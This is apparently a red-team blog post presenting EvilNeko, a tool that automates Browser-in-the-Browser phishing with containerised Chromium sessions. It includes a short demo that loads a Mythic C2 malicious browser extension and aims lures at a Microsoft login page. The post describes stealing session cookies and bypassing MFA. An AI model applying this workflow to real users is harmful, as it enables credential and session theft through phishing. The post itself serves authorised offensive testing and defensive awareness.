EvilNeko: Operationalizing Browser in the Browser Attacks
Browser in the Browser (BITB) attacks work by presenting a fully attacker controlled browser environment to the user which can mimic typical login flows. This subverts the standard guidance such as “check the URL” and builds more trust in targets with the site that they are interacting with. It also simplifies the theft of sessions by having the target perform the login process on red team infrastructure meaning MFA bypass is not required. When I first read about BITB phishing in mr.d0x’s article, I was interested in exploring this further.
So far most of the open source tooling I have found available is focused on frontend templates to create convincing phishing landing pages. I noticed a lack of projects focusing on scaling these types of attacks beyond a single target/session and scaling backend infrastructure to take advantage of these templates. Additionally, I tried tools like EvilNoVNC but wanted more automation, so was inspired to start building.
EvilNeko
During my research, I came across the neko project which serves a browser from a container using WebRTC to allow multiple users to interact with it. The project also has numerous customization options so I thought it would be a good base for a BITB framework. EvilNeko was born.
The main issues I wanted to tackle with this project were:
- Allowing targeting of multiple users/sessions with one toolset
- Automating creation of lures and routing of traffic to multiple lures
- Providing options for BITB attacks to integrate with broader offensive workflows (as I will demo with Mythic)
- Create tooling that can be easily modified to meet the operational need
EvilNeko is a command line python tool that automates the creation and destruction of multiple disposable neko containers running chromium with docker compose. Each container is generated with a UUID as it’s name to be used for keeping each browser isolated to a specific target. EvilNeko then starts NGINX with a generated config and a light flask backend to handle the routing logic to each container.
EvilNeko purposely does not come with a built in payload, but each container can be preloaded with a malicious chrome extension to perform session hijacking and more.
Demo
After cloning the EvilNeko project and ensuring you have NGINX, docker, docker-compose, and flask installed you will want to generate an unpacked chrome extension. For this example we will use the Mythic C2 Leviathan agent. Ensure the folder is named “extension” and place it inside the lures folder like below:
lures
├── chromium.conf
├── extension
│ ├── icons
│ │ └── blank.png
│ ├── main.js
│ ├── manifest.json
│ └── utils
│ └── kl.js
└── policies.json
Then, run EvilNeko and set the URL that you want the containers to open to:
EvilNeko> set_url login.microsoft.com
Next, create a number of lures:
EvilNeko> create_lure 1
As soon as the container spins up you will see the Mythic agent callback:
To confirm the extension is loaded, look in the Chrome instance hosted in the neko container:
You can now send a link to your phishing target and use the many features of this agent such as stealing session cookies, taking screenshots, and more!
EvilNeko enables red teams to easily spin up multiple instances of containers that can be used to emulate BITB attacks at scale. Including support for malicious extensions allows EvilNeko to fit into existing red team stacks.
I did not focus on creating additional frontend templates as there is already a lot of great content from others to use.
Conclusion
EvilNeko helps elevate red team’s abilities to perform BITB attacks, and in turn, raise blue team awareness of these types of techniques. This technique is still powerful as it attacks user trust. Users rely on traditional security awareness programs which teach strategies such as “check the URL.” BITB is currently underutilized, and I hope this generates more interest in the technique. If you are interested in providing feedback or requesting features hop over to my GitHub and open an issue. Thanks for reading!